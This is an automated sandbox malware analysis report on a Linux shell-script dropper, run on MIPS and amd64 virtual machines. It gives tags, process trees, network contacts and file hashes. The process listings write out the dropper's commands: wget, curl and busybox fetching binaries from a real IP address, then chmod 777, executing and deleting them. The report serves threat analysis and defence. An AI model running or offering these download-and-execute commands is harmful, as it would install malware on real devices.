Malware Analysis Report

2025-04-03 18:52

Sample ID 241120-c856qatmhm
Target 5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh
SHA256 5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518
Tags defense_evasion discovery antivm
Score 7/10

Analysis Overview

score
7/10

SHA256

5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518

Threat Level: Shows suspicious behavior

The file 5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-20 02:45

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-20 02:45

Reported

2024-11-20 02:48

Platform

debian9-mipsbe-20240611-en

Max time kernel

96s

Max time network

94s

Command Line

[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 N/A
N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX N/A
N/A /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW N/A
N/A /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI N/A
N/A /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE N/A
N/A /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC N/A
N/A /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz N/A
N/A /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 N/A
N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 N/A
N/A /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 N/A
N/A /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF N/A
N/A /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /usr/bin/curl N/A
File opened for modification /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /usr/bin/curl N/A
File opened for modification /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /usr/bin/curl N/A
File opened for modification /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /usr/bin/curl N/A
File opened for modification /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /usr/bin/curl N/A
File opened for modification /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /usr/bin/curl N/A
File opened for modification /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /usr/bin/curl N/A
File opened for modification /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /usr/bin/curl N/A
File opened for modification /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /usr/bin/curl N/A
File opened for modification /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /usr/bin/curl N/A
File opened for modification /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /usr/bin/curl N/A
File opened for modification /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /usr/bin/curl N/A
File opened for modification /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /usr/bin/curl N/A
File opened for modification /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /usr/bin/curl N/A

Processes

/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh

[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/chmod

[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/rm

[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-20 02:45

Reported

2024-11-20 02:48

Platform

debian9-mipsel-20240611-en

Max time kernel

94s

Max time network

97s

Command Line

[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 N/A
N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX N/A
N/A /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW N/A
N/A /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI N/A
N/A /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE N/A
N/A /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC N/A
N/A /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz N/A
N/A /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 N/A
N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 N/A
N/A /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 N/A
N/A /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF N/A
N/A /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /usr/bin/curl N/A
File opened for modification /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /usr/bin/curl N/A
File opened for modification /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /usr/bin/curl N/A
File opened for modification /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /usr/bin/curl N/A
File opened for modification /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /usr/bin/curl N/A
File opened for modification /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /usr/bin/curl N/A
File opened for modification /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /usr/bin/curl N/A
File opened for modification /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /usr/bin/curl N/A
File opened for modification /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /usr/bin/curl N/A
File opened for modification /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /usr/bin/curl N/A
File opened for modification /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /usr/bin/curl N/A
File opened for modification /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /usr/bin/curl N/A
File opened for modification /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /usr/bin/curl N/A
File opened for modification /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /usr/bin/curl N/A
File opened for modification /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /usr/bin/curl N/A
File opened for modification /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /usr/bin/curl N/A
File opened for modification /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /usr/bin/curl N/A
File opened for modification /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /usr/bin/curl N/A
File opened for modification /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /usr/bin/curl N/A
File opened for modification /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /usr/bin/curl N/A
File opened for modification /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /usr/bin/curl N/A
File opened for modification /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /usr/bin/curl N/A
File opened for modification /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /usr/bin/curl N/A
File opened for modification /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /usr/bin/curl N/A
File opened for modification /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /usr/bin/curl N/A
File opened for modification /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /usr/bin/curl N/A
File opened for modification /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /usr/bin/curl N/A
File opened for modification /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /usr/bin/curl N/A

Processes

/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh

[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/chmod

[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/rm

[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/wget

[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/chmod

[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5

[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/rm

[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/wget

[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/chmod

[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX

[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/rm

[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/wget

[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/chmod

[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW

[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/rm

[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/wget

[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/chmod

[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI

[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/rm

[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/wget

[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/chmod

[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE

[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/rm

[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/wget

[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/chmod

[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC

[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/rm

[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/wget

[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/chmod

[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz

[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/rm

[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/wget

[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/chmod

[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6

[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/rm

[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/wget

[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/chmod

[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV

[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/rm

[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/wget

[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/chmod

[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783

[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/rm

[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/wget

[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/chmod

[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17

[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/rm

[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/usr/bin/wget

[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/chmod

[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF

[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/rm

[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/wget

[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/chmod

[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug

[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/rm

[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-20 02:45

Reported

2024-11-20 02:48

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

30s

Max time network

131s

Command Line

[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 N/A
N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX N/A
N/A /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW N/A
N/A /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI N/A
N/A /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE N/A
N/A /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC N/A
N/A /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz N/A
N/A /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 N/A
N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 N/A
N/A /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 N/A
N/A /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF N/A
N/A /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /usr/bin/curl N/A
File opened for modification /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /usr/bin/curl N/A
File opened for modification /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /usr/bin/curl N/A
File opened for modification /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /usr/bin/curl N/A
File opened for modification /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /usr/bin/curl N/A
File opened for modification /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /usr/bin/curl N/A
File opened for modification /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /usr/bin/curl N/A
File opened for modification /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /usr/bin/curl N/A
File opened for modification /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /usr/bin/curl N/A
